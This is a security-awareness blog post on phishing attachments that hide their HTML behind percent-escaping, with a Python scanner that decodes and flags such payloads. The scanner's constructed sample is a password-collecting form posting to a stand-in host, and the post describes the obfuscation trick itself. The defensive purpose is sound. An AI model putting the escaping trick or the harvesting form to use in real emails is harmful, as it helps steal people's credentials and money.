You often find phishing attacks in your email, and they are sometimes removed by the antivirus software in your organisation. One of the ways you are protected is that the antivirus scans attachments and quarantines infected emails. However, fraudsters are now using ‘escaped’ characters and letting the browser interpret the escape characters, so that the result is then interpreted as normal HTML code.
The normal phishing emails that you see often try to send you a link to click on. This takes you to a compromised site that looks similar to your bank’s website and tries to dupe you into entering your logon credentials.
Later attempts by fraudsters added an attachment; when you opened it with a text reader, you could easily see that it was NOT from your bank.
Recently, some attempt has been made to hide this from you as a reader and from some antivirus scanning tools. The version we see now includes a modified attachment, which seems official if you peek inside.
The fraudsters use an encoding mechanism that replaces each character with its equivalent ASCII code. For example, the ‘spacebar’ or space character (‘ ’) cannot be used in a web address, so an escaped space character is used, viz. ‘%20’. The space character’s ASCII value is 32; the escape sequence is written in hexadecimal, and 32 is 20 hex.
The fraudsters take the text they want to attach to the email and encode all of it using escape sequences. The result is attached to the email as an HTML file.
Once you click on the attachment, the browser loads the file, executes the decode function and then presents the resulting HTML to the user.
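A scanner can undo the same escaping before it inspects the attachment. The sketch below is an added example, not code from the original post: it finds escaped strings passed to a decode function, decodes them statically and reports what they hide. The sample attachment, the `phish.example` host and the marker list are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample: the hidden form, then the attachment as a scanner sees it.
# Every character is percent-escaped, so "<form" and "password" never appear.
HIDDEN_FORM = ('<form action="http://phish.example/collect">'
               '<input type="password" name="pin"></form>')
SAMPLE_ATTACHMENT = (
    "<html><body><script>document.write(unescape('"
    + "".join("%%%02X" % b for b in HIDDEN_FORM.encode("ascii"))
    + "'));</script></body></html>"
)

ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")
# A quoted string handed to one of the browser's decode functions.
DECODE_CALL = re.compile(
    r"(?:unescape|decodeURIComponent|decodeURI)\s*\(\s*(['\"])(.*?)\1", re.S)
# Assumed markers of a credential-harvesting page; tune for your environment.
MARKERS = ("<form", 'type="password"', "<script", "<iframe")

def decode_layers(text, max_rounds=5):
    """Undo %XX escaping until the text stops changing (handles nesting).
    The %uXXXX form accepted by JavaScript's unescape() is not handled."""
    for _ in range(max_rounds):
        decoded = unquote(text, encoding="latin-1")
        if decoded == text:
            break
        text = decoded
    return text

def triage(html):
    """Report each escaped payload found in an HTML attachment."""
    findings = []
    for match in DECODE_CALL.finditer(html):
        payload = match.group(2)
        # Each escape is 3 characters; ratio 1.0 means fully escaped.
        ratio = len(ESCAPE.findall(payload)) * 3 / max(len(payload), 1)
        decoded = decode_layers(payload)
        hits = [m for m in MARKERS if m in decoded.lower()]
        findings.append({"escaped_ratio": round(ratio, 2),
                         "decoded": decoded, "markers": hits})
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_ATTACHMENT):
        print(finding["escaped_ratio"], finding["markers"])
        print(finding["decoded"])
```

A payload with a high escaped ratio whose decoded form contains a form or password field is a strong reason to quarantine the attachment.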
It is becoming very difficult for end-users to ascertain whether an email is valid or not, as sometimes they are expecting information from their banks and it just becomes a habit to click and complete the information.
A war story I have heard from a contractor is that he received an email from his bank on his mobile phone (or that’s what he thought) and forwarded it to his accountant. He received an SMS for his OTP (One Time Password), which he realised was a phishing attempt, and his accountant must have entered information on the phishing website. He phoned his accountant to inform him not to complete anything online as it was a phishing attempt. He said that a few minutes after he put the phone down from speaking to the accountant, someone phoned him to help him complete the online details to the bank as it was not done properly.
In this case the fraudsters are actively sitting and waiting for people to log on, and will even phone you pretending to be from the bank to obtain your logon details.
In the final image, you see the decoded message as the browser will see and execute it.
Be vigilant and share information so that people are not scammed out of their hard-earned money.
Practice safe HEX!